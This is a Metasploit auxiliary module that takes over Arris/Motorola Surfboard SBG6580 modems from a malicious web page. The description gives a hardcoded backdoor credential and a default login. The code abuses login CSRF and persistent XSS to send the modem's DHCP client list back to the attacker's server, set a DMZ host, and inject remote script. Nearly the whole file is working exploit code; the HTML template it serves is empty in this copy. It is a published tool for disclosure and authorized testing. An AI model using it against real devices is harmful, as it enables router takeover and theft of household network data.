## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report def initialize(info = {}) super( update_info( info, 'Name' => 'Arris / Motorola Surfboard SBG6580 Web Interface Takeover', 'Description' => %q{ The web interface for the Arris / Motorola Surfboard SBG6580 has several vulnerabilities that, when combined, allow an arbitrary website to take control of the modem, even if the user is not currently logged in. The attacker must successfully know, or guess, the target's internal gateway IP address. This is usually a default value of First, a hardcoded backdoor account was discovered in the source code of one device with the credentials "technician/yZgO8Bvj". Due to lack of CSRF in the device's login form, these credentials - along with the default "admin/motorola" - can be sent to the device by an arbitrary website, thus inadvertently logging the user into the router. Once successfully logged in, a persistent XSS vulnerability is exploited in the firewall configuration page. This allows injection of Javascript that can perform any available action in the router interface. The following firmware versions have been tested as vulnerable: SBG6580-, and SBG6580- }, 'Author' => [ 'joev' ], 'DisclosureDate' => '2015-04-08', 'License' => MSF_LICENSE, 'Actions' => [[ 'WebServer', { 'Description' => 'Serve exploit via web server' } ]], 'PassiveActions' => [ 'WebServer' ], 'DefaultAction' => 'WebServer', 'References' => [ [ 'CVE', '2015-0964' ], # XSS vulnerability [ 'CVE', '2015-0965' ], # CSRF vulnerability [ 'CVE', '2015-0966' ], # "technician/yZgO8Bvj" web interface backdoor [ 'URL', 'https://www.rapid7.com/blog/post/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems/' ], ] ) ) register_options([ OptString.new('DEVICE_IP', [ false, 'Internal IP address of the vulnerable device.', '' ]), OptString.new('LOGINS', [ false, 'Comma-separated list of user/pass combinations to attempt.', 'technician/yZgO8Bvj,admin/motorola' ]), OptBool.new('DUMP_DHCP_LIST', [ true, 'Dump the MAC, IP, and hostnames of all registered DHCP clients.', true ]), OptInt.new('SET_DMZ_HOST', [ false, 'The final octet of the IP address to set in the DMZ (1-255).', nil ]), OptString.new('BLOCK_INTERNET_ACCESS', [ false, 'Comma-separated list of IP addresses to block internet access for.', '' ]), OptString.new('CUSTOM_JS', [ false, 'A string of javascript to execute in the context of the device web interface.', '' ]), OptString.new('REMOTE_JS', [ false, 'A URL to inject into a script tag in the context of the device web interface.', '' ]) ]) end def run if datastore['SET_DMZ_HOST'] dmz_host = datastore['SET_DMZ_HOST'].to_i if dmz_host < 1 || dmz_host > 255 raise ArgumentError, 'DMZ host must be an integer between 1 and 255.' end end exploit end def on_request_uri(cli, request) if request.method =~ /post/i file = store_loot( 'dhcp.clients', 'text/json', cli.peerhost, request.body, 'arris_surfboard_xss', 'DHCP client list gathered from modem' ) print_good "Dumped DHCP client list from #{cli.peerhost}" print_good file elsif request.uri =~ %r{/dmz$}i print_good "DMZ host successfully reset to #{datastore['SET_DMZ_HOST']}." send_response_html(cli, '') else send_response_html(cli, exploit_html) end end def set_dmz_host_js return '' unless datastore['SET_DMZ_HOST'].present? %| var x = new XMLHttpRequest; x.open('POST', '/goform/RgDmzHost.pl'); x.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); x.send('DmzHostIP3=#{datastore['SET_DMZ_HOST']}'); top.postMessage(JSON.stringify({type:'dmz',done:true}), '*'); | end def dump_dhcp_list_js return '' unless datastore['DUMP_DHCP_LIST'] %| var f = document.createElement('iframe'); f.src = '/RgDhcp.asp'; f.onload = function() { var mac = f.contentDocument.querySelector('input[name="dhcpmacaddr1"]'); var rows = []; if (mac) { var tr = mac.parentNode.parentNode; while (tr) { if (tr.tagName === 'TR' && !tr.querySelector('input[type="Submit"]')) { var tds = [].slice.call(tr.children); var row = []; rows.push(row); for (var i in tds) { row.push(tds[i].innerText); } } tr = tr.nextSibling; } } if (rows.length > 0) { top.postMessage(JSON.stringify({type:'dhcp',rows:rows}), '*'); document.body.removeChild(f); } }; document.body.appendChild(f); | end def exploit_js [ dump_dhcp_list_js, set_dmz_host_js, custom_js ].join("\n") end def exploit_html <<~EOS
EOS end def custom_js rjs_hook + datastore['CUSTOM_JS'] end def rjs_hook remote_js = datastore['REMOTE_JS'] if remote_js.present? "var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); " else '' end end end